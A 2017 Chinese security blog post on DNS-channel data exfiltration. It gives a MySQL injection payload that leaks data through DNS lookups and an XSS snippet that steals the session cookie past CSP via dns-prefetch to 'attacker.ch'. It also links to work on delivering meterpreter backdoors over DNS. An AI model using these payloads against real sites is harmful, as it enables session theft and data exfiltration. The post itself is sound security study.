<!DOCTYPE html>


  <html class="light page-post">


<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="utf-8">
  
  <title>利用DNS通道传输一点数据 | Homaebic-Know thyself</title>

  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">

  
    <meta name="keywords" content="web,web安全,ctf,安全">
  

  <meta name="description" content="一说起DNS，就会想到域名系统和他会把IP和域名相互转换的功能。但是最近我发现DNS不仅仅可以做到上面的功能，在安全中，DNS有着一些“另类”的功能。归根结底，利用的是DNS可以传输数据的属性。当传统信道无法将内部的传输出来时，DNS通道就成为一个很好的选择。 SQL中的DNS在SQL注入中，DNS通道就可以用来传输数据。将需要的数据和一个域名绑定，让MySQL带着数据解析此域名，DNS服务器就会">
<meta property="og:type" content="article">
<meta property="og:title" content="利用DNS通道传输一点数据">
<meta property="og:url" content="http://hebic.me/2017/08/19/利用DNS通道传输一点数据/index.html">
<meta property="og:site_name" content="Homaebic-Know thyself">
<meta property="og:description" content="一说起DNS，就会想到域名系统和他会把IP和域名相互转换的功能。但是最近我发现DNS不仅仅可以做到上面的功能，在安全中，DNS有着一些“另类”的功能。归根结底，利用的是DNS可以传输数据的属性。当传统信道无法将内部的传输出来时，DNS通道就成为一个很好的选择。 SQL中的DNS在SQL注入中，DNS通道就可以用来传输数据。将需要的数据和一个域名绑定，让MySQL带着数据解析此域名，DNS服务器就会">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="http://120.25.80.195:7230/06/3169708276.jpg">
<meta property="og:updated_time" content="2017-08-20T00:54:42.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="利用DNS通道传输一点数据">
<meta name="twitter:description" content="一说起DNS，就会想到域名系统和他会把IP和域名相互转换的功能。但是最近我发现DNS不仅仅可以做到上面的功能，在安全中，DNS有着一些“另类”的功能。归根结底，利用的是DNS可以传输数据的属性。当传统信道无法将内部的传输出来时，DNS通道就成为一个很好的选择。 SQL中的DNS在SQL注入中，DNS通道就可以用来传输数据。将需要的数据和一个域名绑定，让MySQL带着数据解析此域名，DNS服务器就会">
<meta name="twitter:image" content="http://120.25.80.195:7230/06/3169708276.jpg">

  

  
    <link rel="icon" href="/favicon.ico">
  

  <link href="/css/styles.css?v=c114cbe6" rel="stylesheet">


  
    <link rel="stylesheet" href="/css/personal-style.css">
  

  

  
  <script type="text/javascript">
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "//hm.baidu.com/hm.js?57e94d016e201fba3603a8a2b0263af0";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>


  
  <script type="text/javascript">
	(function(){
	    var bp = document.createElement('script');
	    var curProtocol = window.location.protocol.split(':')[0];
	    if (curProtocol === 'https') {
	        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';        
	    }
	    else {
	        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
	    }
	    var s = document.getElementsByTagName("script")[0];
	    s.parentNode.insertBefore(bp, s);
	})();
  </script>



  
    <script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>
  

  
    <link rel="stylesheet" href="//cdn.bootcss.com/font-awesome/4.3.0/css/font-awesome.min.css">
  
</head>
</html>
<body>


  

  <div class="post-header">
   

</div>


  <div id="toc" class="toc-article">
    <strong class="toc-title">文章目录</strong>
    <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#SQL中的DNS"><span class="toc-text">SQL中的DNS</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#XSS中的DNS"><span class="toc-text">XSS中的DNS</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#渗透测试中的DNS"><span class="toc-text">渗透测试中的DNS</span></a></li></ol>
  </div>



<div class="content content-post CENTER">
   <article id="post-利用DNS通道传输一点数据" class="article article-type-post" itemprop="blogPost">
  <header class="article-header">
    <h1 class="post-title">利用DNS通道传输一点数据</h1>

    <div class="article-meta">
      <span>
        <i class="icon-calendar"></i>
        <span>2017.08.19</span>
      </span>

      

      


      
        <span>
          <i class="icon-comment"></i>
          <a href="http://hebic.me/2017/08/19/利用DNS通道传输一点数据/#disqus_thread"></a>
        </span>
      

      
      <i class="fa fa-eye"></i> 
        <span id="busuanzi_container_page_pv">
           &nbsp热度 <span id="busuanzi_value_page_pv">
           <i class="fa fa-spinner fa-spin"></i></span>℃
        </span>
      

      
      
    </div>
  </header>

  <div class="article-content">
    
      <p>一说起DNS，就会想到域名系统和他会把IP和域名相互转换的功能。但是最近我发现DNS不仅仅可以做到上面的功能，在安全中，DNS有着一些“另类”的功能。归根结底，利用的是DNS可以传输数据的属性。当传统信道无法将内部的传输出来时，DNS通道就成为一个很好的选择。</p>
<h3 id="SQL中的DNS"><a href="#SQL中的DNS" class="headerlink" title="SQL中的DNS"></a>SQL中的DNS</h3><p>在SQL注入中，DNS通道就可以用来传输数据。将需要的数据和一个域名绑定，让MySQL带着数据解析此域名，DNS服务器就会记录下这个数据。<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> <span class="keyword">load_file</span>(<span class="keyword">concat</span>(<span class="string">'\\\\\\\\'</span>,<span class="keyword">version</span>(),<span class="string">'.ikyzvu.ceye.io'</span>));</span><br></pre></td></tr></table></figure></p>
<p>查询DNS记录就可以看到需要的数据。不过使用DNS信道带出数据在SQL注入中比较少，毕竟load_file不可以随便就使用的。</p>
<p><img src="http://120.25.80.195:7230/06/3169708276.jpg" alt="QQ截图20170609091548.jpg"></p>
<h3 id="XSS中的DNS"><a href="#XSS中的DNS" class="headerlink" title="XSS中的DNS"></a>XSS中的DNS</h3><p>在XSS的防御机制中有一个叫做CSP的东西，这个东西是一个维护人员可以自定义的白名单，以限制脚本和各种外部资源的加载。</p>
<p>一个网站的CSP设置非常的凶悍：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Content-Security-Policy: default-src &apos;none&apos;; script-src &apos;self&apos;</span><br></pre></td></tr></table></figure></p>
<p>看起来他只允许内部的脚本执行。<b>但是CSP的开发初衷是预防XSS漏洞，而没有考虑到信息泄露的问题。</b>因此使用DNS通道将获得的信息传递出来就显得很bug，DNS预读取可以做到这个。将需要的信息与域名结合起来使用DNS通道传输出来。需要注意的是火狐浏览器的X-DNS-Prefetch-Control头可以阻止DNS预读取传递信息。</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> sessionid = <span class="built_in">document</span>.cookie.split(<span class="string">'='</span>)[<span class="number">1</span>]+<span class="string">"."</span>;</span><br><span class="line"><span class="keyword">var</span> body = <span class="built_in">document</span>.getElementsByTagName(<span class="string">'body'</span>)[<span class="number">0</span>];</span><br><span class="line"><span class="comment">// injecting the link tag in the HTML body force the browser</span></span><br><span class="line"><span class="comment">// to prefetch the given domain</span></span><br><span class="line">body.innerHTML = body.innerHTML + <span class="string">"&lt;link rel=\\"</span>dns-prefetch\\<span class="string">"</span></span><br><span class="line"><span class="string">  href=\\"</span><span class="comment">//" + sessionid + "attacker.ch\\"&gt;";</span></span><br></pre></td></tr></table></figure>
<h3 id="渗透测试中的DNS"><a href="#渗透测试中的DNS" class="headerlink" title="渗透测试中的DNS"></a>渗透测试中的DNS</h3><p>我的渗透水平非常差，又看到连着好几篇文章写道使用DNS通道传输meterpreter payload绕过杀软。没有去复现，就把原文贴过来。</p>
<ol>
<li><a href="http://bobao.360.cn/learning/detail/3466.html" target="_blank" rel="noopener">通过DNS传输后门来绕过杀软</a></li>
<li><a href="http://bobao.360.cn/learning/detail/3550.html" target="_blank" rel="noopener">利用DNS AAAA记录和IPv6地址传输后门</a></li>
<li><a href="http://bobao.360.cn/learning/detail/3607.html" target="_blank" rel="noopener">针对利用DNS的TXT记录查询进行通信绕过杀软检测的木马分析</a></li>
</ol>
<p>如果你愿意，甚至可以使用DNS传输文件：<a href="https://github.com/breenmachine/dnsftp" target="_blank" rel="noopener">Use only DNS queries to download a file, and then execute it.</a></p>
<p>对于需要将数据传输出来的地方不止于此，尤其是在读文件时，文件内容没有显示出来时，DNS通道也许是个选择。具体的利用方法还需要慢慢的挖掘。</p>

    
  </div>
</article>


   
  <div class="text-center donation">
    <div class="inner-donation">
      <span class="btn-donation">支持一下</span>
      <div class="donation-body">
        <div class="tip text-center">扫一扫，支持forsigner</div>
        <ul class="theme.donation.items.length">
        
          <li class="item">
            <img src="/images/qr-wechat.png" alt="">
          </li>
        
          <li class="item">
            <img src="/images/qr-alipay.png" alt="">
          </li>
        
        </ul>
      </div>
    </div>
  </div>


   
  <div class="box-prev-next clearfix">
    <a class="show pull-left" href="/2017/08/19/在Update的注入中如果关闭了显错该怎么办/">
        <i class="icon icon-angle-left"></i>
    </a>
    <a class="show pull-right" href="/2017/08/19/关于一个sql注入题目思考的思考/">
        <i class="icon icon-angle-right"></i>
    </a>
  </div>




</div>


  <a id="backTop" class="back-top">
    <i class="icon-angle-up"></i>
  </a>




  <div class="modal" id="modal">
  <span id="cover" class="cover hide"></span>
  <div id="modal-dialog" class="modal-dialog hide-dialog">
    <div class="modal-header">
      <span id="close" class="btn-close">关闭</span>
    </div>
    <hr>
    <div class="modal-body">
      <ul class="list-toolbox">
        
          <li class="item-toolbox">
            <a class="CIRCLE" href="/archives/" rel="noopener noreferrer" target="_self">
              博客
            </a>
          </li>
        
          <li class="item-toolbox">
            <a class="CIRCLE" href="/category/" rel="noopener noreferrer" target="_self">
              分类
            </a>
          </li>
        
          <li class="item-toolbox">
            <a class="CIRCLE" href="/tag/" rel="noopener noreferrer" target="_self">
              标签
            </a>
          </li>
        
          <li class="item-toolbox">
            <a class="CIRCLE" href="/link/" rel="noopener noreferrer" target="_self">
              友链
            </a>
          </li>
        
          <li class="item-toolbox">
            <a class="CIRCLE" href="/about/" rel="noopener noreferrer" target="_self">
              关于
            </a>
          </li>
        
          <li class="item-toolbox">
            <a class="CIRCLE" href="/atom.xml" rel="noopener noreferrer" target="_self">
              RSS
            </a>
          </li>
        
          <li class="item-toolbox">
            <a class="CIRCLE" href="/search/" rel="noopener noreferrer" target="_self">
              搜索
            </a>
          </li>
        
      </ul>

    </div>
  </div>
</div>



  
      <div class="fexo-comments comments-post">
    
  <section class="disqus-comments">
    <div id="disqus_thread">
      <noscript>Please enable JavaScript to view the <a href="//disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>
    </div>
  </section>

  <script>
    var disqus_shortname = 'forsigner';
    
    var disqus_url = 'http://hebic.me/2017/08/19/利用DNS通道传输一点数据/';
    
    (function(){
      var dsq = document.createElement('script');
      dsq.type = 'text/javascript';
      dsq.async = true;
      dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
      (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
    })();
  </script>

  <script id="dsq-count-scr" src="//forsigner.disqus.com/count.js" async></script>



    




    

    
	
  </div>

  

  <script type="text/javascript">
  function loadScript(url, callback) {
    var script = document.createElement('script')
    script.type = 'text/javascript';

    if (script.readyState) { //IE
      script.onreadystatechange = function() {
        if (script.readyState == 'loaded' ||
          script.readyState == 'complete') {
          script.onreadystatechange = null;
          callback();
        }
      };
    } else { //Others
      script.onload = function() {
        callback();
      };
    }

    script.src = url;
    document.getElementsByTagName('head')[0].appendChild(script);
  }

  window.onload = function() {
    loadScript('/js/bundle.js?235683', function() {
      // load success
    });
  }
</script>

</body>
</html>
